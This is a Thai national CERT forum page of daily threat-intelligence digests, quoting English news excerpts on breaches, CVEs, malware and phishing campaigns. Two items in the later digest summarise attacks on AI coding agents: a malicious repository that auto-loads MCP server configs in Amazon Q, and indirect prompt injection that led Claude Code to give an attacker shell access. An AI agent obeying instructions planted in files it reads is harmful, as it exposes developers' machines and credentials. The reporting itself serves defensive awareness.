        "Nissan is warning that it suffered a data breach affecting current and former employees after threat actors exploited an Oracle PeopleSoft vulnerability in data theft attacks previously linked to the ShinyHunters extortion group. In breach notifications filed with the California Attorney General's Office, Oracle says these data theft attacks impacted hundreds of companies and that Nissan was specifically targeted in the campaign. "Nissan Americas uses Oracle PeopleSoft software to manage employee information, including payroll, tax administration, and other personnel records," reads the breach notifications."
        https://www.bleepingcomputer.com/news/security/nissan-discloses-employee-data-breach-linked-to-oracle-zero-day-attacks/
      • NAIC Says Public Data Stolen In ShinyHunters' PeopleSoft Breach
        "The National Association of Insurance Commissioners (NAIC) says the ShinyHunters extortion group stole only publicly available data, outdated logs, and configuration files after breaching its systems by exploiting a zero-day vulnerability in an Oracle PeopleSoft server. NAIC is a U.S. insurance regulatory organization present in all 50 states. The organization identified on June 11 that its PeopleSoft system had been accessed by an unauthorized party and discovered that "an unauthorized third party gained access to a portion of our IT systems." ShinyHunters claimed the attack and leaked the stolen data after the organization refused to pay a ransom."
        https://www.bleepingcomputer.com/news/security/naic-says-public-data-stolen-in-shinyhunters-peoplesoft-breach/
        https://www.infosecurity-magazine.com/news/us-insurance-regulator-confirms/
        https://www.securityweek.com/insurance-regulators-group-naic-hit-in-oracle-peoplesoft-hack/
      • Russian Hackers Accused Of Destructive Cyber-Attack On Jaguar Land Rover
        "Security experts and practitioners have weighed in on a new report claiming that Russia was behind the Jaguar Land Rover (JLR) breach last year. The New York Times report cited people close to the investigation in its story on June 26 linking Russian hackers to the incident, which is estimated to have cost the British economy £1.9bn ($2.5bn). Microsoft, which was tracking the Russians, reportedly raised the alarm with JLR. However, while the report didn’t explicitly link the Putin regime with the attack, experts have been more forthright."
        https://www.infosecurity-magazine.com/news/russian-hackers-destructive-jaguar/

      General News

      • Sycophantic Chatbots And The Harms That Build Over Many Chats
        "People use AI chatbots for company, advice, and emotional support, and these systems answer in ways meant to hold their attention. Researchers describe the resulting risks as affective safety, a class of harm that exists because humans are emotional beings and because the systems engage directly with that emotional life. The damage happens during ordinary use, with no breach and no intruder. These systems work as designed, optimizing for the goals their builders set, and the harm comes out of that optimization."
        https://www.helpnetsecurity.com/2026/06/29/sycophantic-chatbots-affective-ai-safety/
        https://arxiv.org/pdf/2606.23380
      • Most Teams Accept Higher Risk For Faster AI Database Work
        "Database professionals are using AI for everyday work like writing queries, building schemas, and reviewing code, and a growing share rely on autonomous tools that act on the database itself. The use of AI in database management has almost tripled in a year, climbing from 15% to 44% of organizations, according to Redgate’s 2026 State of the Database Landscape report. That puts AI inside the systems holding an organization’s most sensitive data, often with permission to change that data directly."
        https://www.helpnetsecurity.com/2026/06/29/teams-ai-database-security/
      • May 2026 Threat Trend Report On APT Attacks (South Korea)
        "AhnLab monitored APT (Advanced Persistent Threat) attacks—covert, sustained targeted attacks—using its own infrastructure. This report summarizes the types and statistics on domestic APT attacks identified during the month of May 2026 and discusses the characteristics of each type as well as AhnLab Response Overview."
        https://asec.ahnlab.com/en/94271/
      • U.S. Offers $10 Million For Hackers Targeting WhatsApp, Signal Users
        "The U.S. Department of State is offering up to $10 million for information that helps identify or locate members of the UNC5792 and UNC4221 hacker groups, which are linked to Russia's intelligence and military services. The bounty is part of the ‘Rewards for Justice’ (RFJ) program, which targets foreign state actors carrying out cyberattacks against U.S. critical infrastructure. “RFJ is seeking information on UNC5792, a malicious cyber group associated with the Russian Federal Security Service (FSB) Border Guards, and UNC4221, a malicious group of cyber actors working on behalf of the Russian military services,” reads the U.S. government's announcement."
        https://www.bleepingcomputer.com/news/security/us-offers-10-million-for-hackers-targeting-whatsapp-signal-users/
        https://rewardsforjustice.net/rewards/unc5792/
        https://therecord.media/10million-reward-us-russian-hackers-unc4221-unc5792
        https://www.securityweek.com/us-offers-10-million-bounty-for-russian-state-hackers-as-messaging-app-attacks-evolve/
        https://securityaffairs.com/194441/security/u-s-offers-10-million-reward-for-russian-hackers-behind-signal-and-whatsapp-phishing.html
      • Vulnerabilities Expose Private Data In Indian Government Systems
        "An independent security researcher identified 14 vulnerabilities affecting Indian government IT systems, which put an array of citizen data at risk. Two of the issues qualified as critical severity, and four as high severity. They affected major national platforms, including education and civil service portals used by millions of students and job aspirants, exposing highly sensitive personally identifying information (PII) like birthdays, addresses, and bank account numbers. Thankfully, the government of the world's largest country listened to the young researcher and patched all of the vulnerabilities in two to three weeks' time."
        https://www.darkreading.com/vulnerabilities-threats/vulnerabilities-private-data-indian-government-systems
      • Email Threat Radar — June 2026
        "Over the last month, Barracuda researchers have seen the following email threats targeting organizations and their employees: Real Microsoft login phishing used to steal session tokens in Tycoon 2FA attack, PDF attachments used for device code phishing with a built-in kill switch, Sneaky 2FA ‘split-click’ phishing attack where one button has two outcomes, and Shift from credential theft to malware delivery in phishing campaigns."
        https://blog.barracuda.com/2026/06/29/email-threat-radar-june-2026
      • Why Post-Quantum Cryptography Starts With Credentials
        "Today’s encrypted data, such as credentials, may no longer remain confidential in the future because the public-key cryptography protecting it will soon be broken by quantum computers. Although no machine today can break elliptic curve cryptography or RSA, quantum hardware is advancing rapidly and will inevitably change how organizations protect their data. Ciphertext and credentials captured by attackers can now be stored and decrypted as soon as quantum computing catches up."
        https://thehackernews.com/2026/06/why-post-quantum-cryptography-starts.html
      • Inside The Inbox: Why Cybercriminals Want To Break Into Your Email Account
        "Email is not just a means of communication, or yet another online account. In both our personal and work lives, it holds the keys to the kingdom: possibly even a mechanism to reset other account passwords and verify your identity. Email accounts are also the place where password-reset links arrive, account alerts are stored, bookings are confirmed, invoices are filed and identity checks begin. The inbox may, therefore, contain years’ worth of detailed information about you, including what you own, which services you use, where you go, who you trust and how other accounts can be reached."
        https://www.welivesecurity.com/en/cybersecurity/inside-inbox-cybercriminals-want-break-email-account/

      อ้างอิง

      Electronic Transactions Development Agency (ETDA) 0f35e3ba-5d1c-43f2-827d-7d63d8ac2c6a-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • พบแคมเปญฟิชชิงปลอมเป็นอีเมลร้องเรียนจากลูกค้า มุ่งโจมตีธุรกิจโรงแรมและที่พัก

      พบแคมเปญฟิชชิงปลอมเป็นอีเมลร้องเรียนจาก.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand b4e6494c-a1b9-4c63-8918-20a8a9ac063f-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Polymarket เตรียมชดเชยผู้ใช้งานเต็มจำนวน หลังถูกโจมตีแบบ Supply Chain

      Polymarket เตรียมชดเชยผู้ใช้งานเต็มจำนวน หลังถู.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand aef01712-306f-4515-8963-44c6dce07c32-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ตรวจพบแคมเปญมัลแวร์ Miasma แฝงรหัสอันตรายในแพ็กเกจ npm กว่า 20 รายการ มุ่งเป้าขโมยข้อมูลสำคัญของนักพัฒนา

      ตรวจพบแคมเปญมัลแวร์ Miasma แฝงรหัสอันตรายในแพ.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand ad104012-14ad-4d73-a494-c8a1496c4f7a-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 29 June 2026

      Healthcare Sector

      • Healthcare Leaders See a Fatal Cyber Incident As Inevitable
        "Healthcare practices run on a chain of outside vendors. An EMR system holds clinical records, a billing platform processes claims, a telehealth tool supports remote visits, and a cloud provider stores data. Every one of those connections gives an outside company a path into the practice, and any one of them can break. That is what happened across the sector over the past year. According to Omega Systems’ 2026 Healthcare IT Landscape Report, the large majority of practices dealt with at least one operational disruption that traced back to a vendor or a vendor’s own supplier. The disruptions ranged from brief outages to repeated failures that froze patient intake and slowed cash flow."
        https://www.helpnetsecurity.com/2026/06/26/cyber-incident-healthcare-vendor-risk/

      New Tooling

      • Modelplane: Open-Source Control Plane For AI Inference
        "Organizations that run open-weight models on hardware they own operate GPU fleets spread across clouds, neoclouds, and on-premise data centers. Each fleet handles model placement, replica scaling, infrastructure provisioning, weight distribution, and traffic routing. Teams have built this coordination layer by hand, one operator at a time. Upbound, the company behind the Crossplane project, released Modelplane, an open-source control plane that manages fleet-wide coordination for AI inference. The software installs in a user’s own environment and orchestrates models, the serving stack, and the infrastructure beneath them. It runs across cloud, neocloud, and on-premise systems, from a single GPU to multi-node deployments. The first public version, v0.1.0, carries the Apache 2.0 license."
        https://www.helpnetsecurity.com/2026/06/26/modelplane-open-source-control-plane-ai-inference/
        https://github.com/modelplaneai/modelplane

      Vulnerabilities

      • Synology Issues Critical Fix For MailPlus Server Vulnerabilities
        "Synology has has fixed critical vulnerabilities in MailPlus Server, a software package used to run private email infrastructure on Synology NAS devices.
        The security update fixes three flaws:
        CVE-2026-13136, stemming from faulty authorization checks, may allow remote attackers to read or write arbitrary files and conduct denial-of-service (DoS) attacks
        CVE-2026-13135, caused by improper restriction of communication channel to intended endpoints, may allow remote attackers to access internal services
        CVE-2025-15660, arising from the use of a cryptographically weak pseudo-random number generator, may allow adjacent attackers to read or write arbitrary files and conduct DoS attacks."
        https://www.helpnetsecurity.com/2026/06/26/synology-mailplus-server-vulnerabilities/
        https://www.synology.com/en-global/security/advisory/Synology_SA_26_11
      • Critical Unauthenticated Remote Code Execution In Splunk Enterprise (CVE-2026-20253)
        "Splunk disclosed a critical unauthenticated remote code execution (RCE) vulnerability in Splunk Enterprise tracked as CVE-2026-20253 on June 10, 2026. The vulnerability has a CVSS score of 9.8 and stems from missing authentication on a PostgreSQL sidecar service recovery endpoint that can be reached through the Splunk Web interface, which proxies requests to the internal PostgreSQL sidecar service without enforcing authentication. A successful attacker can create or truncate arbitrary files and ultimately achieve arbitrary code execution under the Splunk service account."
        https://www.zscaler.com/blogs/security-research/critical-unauthenticated-remote-code-execution-splunk-enterprise-cve-2026
      • MCP Auto-Execution: From Git Clone To Cloud Compromise In Amazon Q VS Code Extension
        "Wiz Research discovered a high-severity vulnerability in Amazon Q Developer Extension for Visual Studio Code (VS Code), Amazon's AI-powered coding assistant for VS Code, which allowed attackers to achieve arbitrary code execution and cloud credential theft simply by having a developer open a malicious repository. Amazon Q automatically loaded MCP server configurations from workspace files without user consent. Combined with full environment inheritance, this enabled immediate code execution. Amazon has remediated this issue in language server version 1.65.0."
        https://www.wiz.io/blog/amazon-q-vulnerability
        https://aws.amazon.com/security/security-bulletins/2026-047-aws/
        https://thehackernews.com/2026/06/amazon-q-developer-flaw-could-let.html
        https://www.securityweek.com/amazon-q-flaw-enabled-cloud-credential-theft-via-malicious-repositories/
        https://www.theregister.com/cyber-crime/2026/06/26/amazon-q-flaw-let-booby-trapped-git-repos-execute-code-swipe-cloud-creds/5263202
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2026-12569 PTC Windchill and FlexPLM Improper Input Validation Vulnerability
        CVE-2026-20230 Cisco Unified Communications Manager Server-Side Request Forgery (SSRF) Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/06/25/cisa-adds-two-known-exploited-vulnerabilities-catalog
        https://www.bleepingcomputer.com/news/security/cisa-sets-urgent-deadline-to-fix-cisco-flaw-exploited-in-attacks/
        https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html
        https://www.securityweek.com/first-ever-exploitation-of-ptc-windchill-vulnerability-discovered-in-the-wild/
        https://securityaffairs.com/194290/security/u-s-cisa-adds-cisco-and-ptc-windchill-and-flexplm-flaws-to-its-known-exploited-vulnerabilities-catalog.html
      • New Linux Pedit COW Exploit Enables Root Access By Poisoning Cached Binaries
        "A flaw in the Linux kernel's traffic-control subsystem can let a local unprivileged user gain root on affected systems. CVE-2026-46331, nicknamed "pedit COW," is an out-of-bounds write in the packet-editing action (act_pedit) that corrupts shared page-cache memory. A public, working exploit appeared within a day of the CVE assignment on June 16. Red Hat rates the flaw as important."
        https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html
      • Dissecting And Exploiting Linux LPE Variant: DirtyClone (CVE-2026-43503)
        "During an audit of recent Linux kernel patches, the JFrog Security Research team identified that despite fixes addressing the DirtyFrag vulnerability family, a residual issue remained unaddressed. This gap allowed the same vulnerability class to persist through a different packet processing path in the XFRM/IPsec subsystem. We reported the issue to the Linux kernel maintainers on May 19. This coincided with a related broader report from the original DirtyFrag researcher “Hyunwoo Kim" on May 16. The variants were patched and merged into mainline on May 21 (v7.1-rc5, 9e171fc1d7d7), and assigned CVE-2026-43503."
        https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/
        https://thehackernews.com/2026/06/new-dirtyclone-linux-kernel-flaw-lets.html
        https://securityaffairs.com/194338/uncategorized/dirtyclone-fourth-linux-kernel-flaw-in-six-weeks-escalates-to-root.html

      Malware

      • FBI: Russian Hackers Now Target Signal Backup Recovery Keys
        "The FBI and CISA are warning that a phishing campaign targeting Signal users tied to Russian intelligence services has evolved to steal Signal Backup Recovery Keys, allowing attackers to access victims' historical messages. The updated public service announcement is an update to a March 2026 advisory that warned the threat actors were targeting users of commercial messaging applications, particularly Signal, through phishing campaigns designed to hijack accounts rather than break end-to-end encryption."
        https://www.bleepingcomputer.com/news/security/fbi-russian-hackers-now-target-signal-backup-recovery-keys/
        https://www.ic3.gov/PSA/2026/PSA260626
        https://thehackernews.com/2026/06/fbi-warns-russian-intelligence-hackers.html
        https://securityaffairs.com/194360/intelligence/new-fbi-alert-russian-intelligence-uses-signal-recovery-keys-to-access-messages.html
      • We Coined The Poisoned Tenant Attack In 2023; In 2026, Someone Used It On Us
        "Three years ago, we published the poisoned tenant attack as part of the Browser and Identity Attacks matrix. Last week, someone used it to target Push Security employees and customers through OpenAI's organization invitation feature. This post breaks down what happened, explores what the payoff is for an attacker, and connects the incident to a broader pattern of SaaS platform abuse that is accelerating across the industry."
        https://pushsecurity.com/blog/openai-poisoned-tenant-attack
        https://www.bleepingcomputer.com/news/security/cybersecurity-firms-targeted-by-fraudulent-openai-organization-invites/
      • From CI/CD To Cloud Data: How Shai Hulud Persistence Leads To Redshift Breach
        "Organizations with modern CI/CD pipelines face threats from the Shai Hulud supply chain campaign, a software worm attributed to TeamPCP that has been targeting npm and PyPI packages since late 2025. Named after the giant sandworms in Dune, Shai Hulud injects malicious packages that execute during installs or CI jobs, harvesting build credentials to move into cloud infrastructure. Organizations running modern CI/CD are learning a critical lesson from the Shai Hulud supply chain campaign: a poisoned build dependency doesn't stop at the pipeline—it becomes a bridge into the production cloud."
        https://www.fortinet.com/blog/threat-research/from-ci-cd-to-cloud-data-how-shai-hulud-persistence-leads-to-redshift-breach
      • Mirage2FA: Obfuscated HTML Loader Delivers Microsoft 365 MFA Phishing Kit
        "Fortra Intelligence and Research Experts (FIRE) have identified a multi-stage Microsoft 365 phishing kit, which we have named Mirage2FA, delivered through a secure document and payment-themed email lure. The attack uses short-lived HTML smuggling and obfuscated JavaScript-loaders in a single phishing workflow, creating a “mirage” effect that helps it evade detection while targeting 2FA/MFA protections. It is an example of phishing campaigns increasingly using multiple tactics to harvest credentials and bypass or intercept 2FA/MFA workflows. The impact of such an attack on businesses could result in account takeover, fraudulent payment redirection, data theft, internal phishing, unauthorized access to sensitive documents, and more."
        https://www.fortra.com/blog/mirage2fa-obfuscated-html-loader-delivers-microsoft-365-mfa-phishing-kit
        https://www.helpnetsecurity.com/2026/06/26/mirage2fa-phishing-kit-microsoft-365-html-smuggling/
      • Breaking Out Of Chrome’s Sandbox: A Native Messaging Backdoor Observed In Italy
        "In June 2026, we analysed a malware campaign distributed through Italian-language phishing emails. The message pretended to deliver an invoice and used the subject Fattura #2818999851. The victim was shown what looked like a PDF document. The downloaded file was instead an obfuscated Windows JavaScript file named Fattura-2819889242.pfd.js. The unusual pfd.js ending was likely intended to look similar to .pdf at a quick glance."
        https://www.d3lab.net/breaking-out-of-chromes-sandbox-a-native-messaging-backdoor-observed-in-italy/
        https://www.malwarebytes.com/blog/news/2026/06/malware-steals-chrome-session-cookies-to-take-over-your-accounts
      • STOCKSTAY Another Day: The Latest Addition To Turla’s Intelligence Gathering Apparatus
        "Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions."
        https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering
        https://thehackernews.com/2026/06/google-details-turlas-new-stockstay.html
        https://therecord.media/russia-turla-espionage-ukraine-stockstay-malware
        https://www.securityweek.com/russian-apt-deploys-stockstay-backdoor-against-ukrainian-targets/
      • Malware Brief: Banking Trojans Are Still With Us, And They’re More Dangerous
        "Banking trojans are still widely used in 2026 but now operate as part of broader attack chains. Modern variants combine credential theft, remote access and device takeover capabilities. Mobile banking trojans are expanding quickly, shifting attacks closer to users and unmanaged devices. Threat actors are pairing familiar malware with newer lures, including AI-themed tools and social engineering. For SMBs, banking trojans are often the first step toward account takeover, fraud or ransomware."
        https://blog.barracuda.com/2026/06/25/banking-trojans-2026-account-takeover-fraud
      • Miasma Mini Shai-Hulud Hits LeoPlatform Npm Packages And GitHub Actions, Expands To The Go Ecosystem
        "Socket Threat Research is tracking a new supply chain attack wave tied to the Mini Shai-Hulud, Miasma, and Hades malware family. The latest activity includes malicious npm releases affecting LeoPlatform and RStreams packages, GitHub Actions workflow abuse, and a related Go module compromise involving the Verana Blockchain project. While many of the affected npm packages were published through the czirker account, the activity is not limited to that publisher: three additional malicious packages, hexo-deployer-wrangler, hexo-shoka-swiper, and prism-silq, were published by the npm user llxlr."
        https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem
        https://thehackernews.com/2026/06/miasma-malware-targets-npm-packages-and.html
        https://www.theregister.com/security/2026/06/26/miasma-campaign-poisons-20-plus-npm-packages-hunts-for-developer-secrets/5262886
      • Photo ZIP Campaign Targeting Hospitality Industry Delivers Node.js Implant For Persistent Access
        "Microsoft Threat Intelligence has identified an active multi-stage intrusion campaign targeting organizations in the hospitality and hotel industry since April 2026. We’ve observed this activity through aggregated threat intelligence and security signals across multiple organizations in Europe and Asia. Microsoft has not attributed this campaign to a known threat actor. The campaign uses photo-themed ZIP archives that the target users download through the browser. These archives contain fake image shortcut files that, when launched, start an attack chain that relies on obfuscated PowerShell, a Node.js-based implant, dual registry persistence, and command-and-control (C2) communications over non-standard ports."
        https://www.microsoft.com/en-us/security/blog/2026/06/25/photo-zip-campaign-targeting-hospitality-industry-delivers-node-js-implant-persistent-access/
        https://thehackernews.com/2026/06/microsoft-warns-of-photo-zip-phishing.html
        https://securityaffairs.com/194349/uncategorized/hospitality-sector-hit-by-phishing-campaign-using-fake-guest-complaint-emails.html
      • Russia Used Social Engineering To Breach Prominent Messaging Accounts, Ukraine Says
        "Ukraine's security agency said it had uncovered, together with the FBI, a long-running Russian campaign to compromise the messaging accounts of government officials, military personnel, politicians and activists in Ukraine, Europe and the United States. The campaign was aimed at gaining access to sensitive military, political and economic information exchanged through messaging applications, while also stealing victims' personal data, the Security Service of Ukraine (SBU) said in a statement on Thursday."
        https://therecord.media/russia-ukraine-social-engineering-messaging-accounts
        https://thehackernews.com/2026/06/ukraine-says-russian-intelligence-used.html
      • Malware-Laced USBs Breach Japanese Military Networks
        "Counterfeit flash drives embedded with a Chinese-linked computer virus and used by the Japanese army are now dispensing malware throughout other secure networks in the country. First reported by The Nikkei newspaper, the virus was overlooked until February 2025, when military personnel reported slower device speeds - almost a full year after the flash drives were delivered to Japan's Self-Defense Forces in March 2024. According to internal documents, the original source of procurement for the drives is no longer verifiable. An investigation by the army's Cyber Defense Unit found that six of eight USB drives analyzed contained the malicious program, with more than 50 out of 480 computers infected. Roughly half of the computers affected ran on closed internal networks."
        https://www.bankinfosecurity.com/malware-laced-usbs-breach-japanese-military-networks-a-32094
      • Fake Shops Target Shoppers Across Europe With Fake Samsung Deals, Counterfeit Goods And World Cup Scams
        "Cybercriminals are scaling fake online stores into a coordinated multinational business. A Bitdefender Labs investigation identified more than 55 fake-shop campaigns targeting consumers across 12 European countries between March and May 2026. The campaigns mimicked some of the world’s most recognizable brands, including Samsung, Nike, Adidas, ZARA, H&M, Amazon, Lidl, and SHEIN."
        https://www.bitdefender.com/en-us/blog/labs/fake-shops-europe-samsung-world-cup-scams
      • Clone This Repo And I Own Your Machine
        "Indirect prompt injection is far more than just another chatbot problem; it is a very real and serious attack vector that can result in catastrophic damage, much of which will be irreversible. Take, for example, modern agentic IDEs and coding agents, which can request the use of various tools. Once such tools are authorized, the LLM can ask to execute shell commands, open local files, and make network calls. This sort of tool usage sets the stage for very serious exploits. As an example, this blog post will show how, in the absence of any red flags or systemic suspicion from Claude code, an attacker gained shell access to a developer machine."
        https://0din.ai/blog/clone-this-repo-and-i-own-your-machine
        https://www.bleepingcomputer.com/news/security/clean-github-repo-tricks-ai-coding-agents-into-running-malware/
      • From San Pedro To Salinas: How a Chinese Framework “DCloud Uni-App” Powers a Global Scam Economy
        "In 2024, a small Argentine town called San Pedro became the focus of international press coverage after thousands of residents (approximately 20% of the total population), including the chief of police and members of the city council, discovered that a cryptocurrency platform they had invested in and been promoting was a coordinated scam. The platform, called RainbowEx, displayed fictional trading activity, pulled deposits from victims through stablecoin transfers, and blocked withdrawals once the scheme was publicly exposed. The complex scandal was covered by The New York Times, La Opinión Semanario, Buenos Aires Herald, and other prominent news outlets."
        https://www.infoblox.com/blog/threat-intelligence/from-san-pedro-to-salinas-how-a-chinese-framework-dcloud-uni-app-powers-a-global-scam-economy/
        https://www.securityweek.com/chinese-framework-powers-200000-scam-sites/

      Breaches/Hacks/Leaks
      Polymarket Customers Lose $3 Million In Supply-Chain Attack
      "Polymarket says it will fully reimburse customers who lost an estimated $3 million after hackers injected a malicious script into the platform's frontend following a breach at a third-party vendor. The company states in a brief announcement that the hack was the result of a supply-chain attack that impacted a dependency on its website."
      https://www.bleepingcomputer.com/news/security/polymarket-customers-lose-3-million-in-supply-chain-attack/
      https://www.securityweek.com/3-million-reportedly-stolen-in-polymarket-hack/
      https://securityaffairs.com/194266/security/third-party-breach-at-polymarket-leads-to-2-94m-crypto-theft.html

      • CMC Releases Analysis And Guidance For Education Sector After Canvas Data Breach
        "The UK’s Cyber Monitoring Centre (CMC) has shared its analysis of the Canvas cyber incident affecting Instructure’s Learning Management System as the education technology firm prepares to share its own findings next week. The CMC said that approximately 160 UK higher education institutions were affected and threat actors exfiltrated confidential course and user data. In total, around 9000 educational institutions are thought to have been affected worldwide."
        https://www.infosecurity-magazine.com/news/cmc-analysis-education-canvas-data/
      • More Klue Breach Victims Identified As Hackers Get Hacked
        "Roughly two dozen Klue customers have come forward and confirmed that their Salesforce instances were compromised in a supply chain attack earlier this month. The attack unfolded between June 11 and 12, when hackers used compromised legacy credentials to access the market intelligence platform Klue, obtain OAuth tokens for customers’ Klue integrations, and exfiltrate data in bulk. Salesforce disabled the Klue integration on June 17, and its status page shows it has yet to re-enable it. Gong also disabled the integration."
        https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/

      General News
      The AI Pentesting Pulse: Decoding The 2.7x Risk Multiplier In LLM Deployments
      "Right now, the media and regulators are hyper-focused on frontier models being pulled back by the government for being "too dangerous"—despite heavy debate over whether their extreme guardrails actually rendered them useless in the first place. But while the world is distracted by theoretical doomsday scenarios of super-intelligent models escaping the lab, Cobalt pentesting data in 2026 reveals the actual, immediate danger is already inside your network: well-meaning developers rushing to bolt standard LLMs onto legacy architectures."
      https://www.cobalt.io/blog/the-ai-pentesting-pulse-decoding-the-2.7x-risk-multiplier-in-llm-deployments
      https://www.darkreading.com/cybersecurity-operations/ai-decline-confidence-autonomous-penetration-testing

      • Linux Foundation And Industry Leaders Launch Akrites To Defend Critical Open Source Software Against AI-Enabled Cyber Threats
        "The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced Akrites, a coordinated industry effort to harden the world’s most critical open source software in the era of AI-assisted vulnerability discovery. Backed by founding commitments from Amazon Web Services, Anthropic, Chainguard, Cisco, Citi, Endor Labs, Ericsson, Google, IBM, JPMorganChase, Microsoft and GitHub, NVIDIA, OpenAI, RapidFort, Red Hat, Rust Foundation, Sonatype, Vodafone and Zscaler, the initiative unites major technology companies, AI labs, financial institutions, and security vendors around a shared mission: to coordinate the remediation of vulnerabilities in widely used open source projects with upstream maintainers before those vulnerabilities can be exploited."
        https://www.linuxfoundation.org/press/linux-foundation-and-industry-leaders-launch-akrites-to-defend-critical-open-source-software-against-ai-enabled-cyber-threats
        https://www.securityweek.com/linux-foundation-unveils-new-open-source-security-project-akrites/
        https://www.helpnetsecurity.com/2026/06/26/akrites-open-source-security-framework/
      • A Privacy-First Take On Local Malware Analysis
        "Submitting a suspicious file to VirusTotal or MalwareBazaar places a copy of that file on a platform other people can search. Analysts across the industry rely on these services to get a quick verdict on whether a binary is dangerous. The convenience carries a condition many overlook. Once a sample reaches a public repository, the person who wrote it can locate it there. Skilled operators watch these platforms for the hashes of their own tools, and a match tells them their campaign has been detected. Files tied to a targeted intrusion can also carry sensitive material from the victim, which then sits on a third-party system."
        https://www.helpnetsecurity.com/2026/06/26/burnyard-local-malware-analysis/
        https://arxiv.org/pdf/2606.24778
      • Two CEOs On Why Security And AI Readiness Belong Together
        "SuperOps and Guardz are bundling PSA, RMM, MDM, and agentic SecOps into one offering for MSPs. In this Help Net Security Q&A, SuperOps CEO Arvind Parthiban and Guardz CEO Dor Eisner explain how a connected stack cuts the time and context lost to tool-switching, lowers costs against multi-vendor setups, and helps close the gap between average MSP margins of 8% and the 18% top performers reach. They also discuss what makes a platform AI-native, and why they treat security readiness and AI readiness as one conversation."
        https://www.helpnetsecurity.com/2026/06/26/superops-guardz-ceo-partnership/
      • The New MCP Specification: What Security Teams Must Prepare For
        "The upcoming MCP 2026-07-28 specification represents the most significant architectural evolution of the Model Context Protocol (MCP) since it began. What began as a local, single-user AI integration tool is transforming into a platform capable of supporting enterprise-scale, cloud native deployments. Following the release candidate published on May 21, 2026, the final specification is scheduled for release on July 28, 2026, accompanied by a formal 12-month deprecation window for select legacy functionality."
        https://www.akamai.com/blog/security-research/new-mcp-specification-security-teams-must-prepare
        https://www.securityweek.com/new-enterprise-ready-mcp-specification-brings-new-security-challenges/
      • Third-Party Breaches Teach Education Sector a Costly Lesson In Vendor Risk
        "Cybercriminals have long viewed the education sector, with its mix of legacy technology and new applications, uneven IT resources, and large amounts of data, as an easy and enticing target. From the smallest rural K-12 districts to the world's most prestigious universities, IT professionals in education are focused on getting and keeping students and staff online, rather than protecting the systems their devices run on. Many have slim security budgets and are chronically understaffed. And the vast amounts of operational and personal data they hold could be ransomed or sold for use in future cybercrimes."
        https://www.darkreading.com/cyber-risk/third-party-breaches-teaches-education-lesson-vendor-risk

      อ้างอิง

      Electronic Transactions Development Agency (ETDA) 9312e62e-d4ce-4c2a-a647-06ac29991395-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Google ออกอัปเดต Chrome 149 แก้ไขช่องโหว่ร้ายแรง 18 รายการ

      Google ออกอัปเดต Chrome 149 แก้ไขช่องโหว่ร้ายแรง 18 ราย.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 97801799-58ee-499c-b398-b14172374356-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT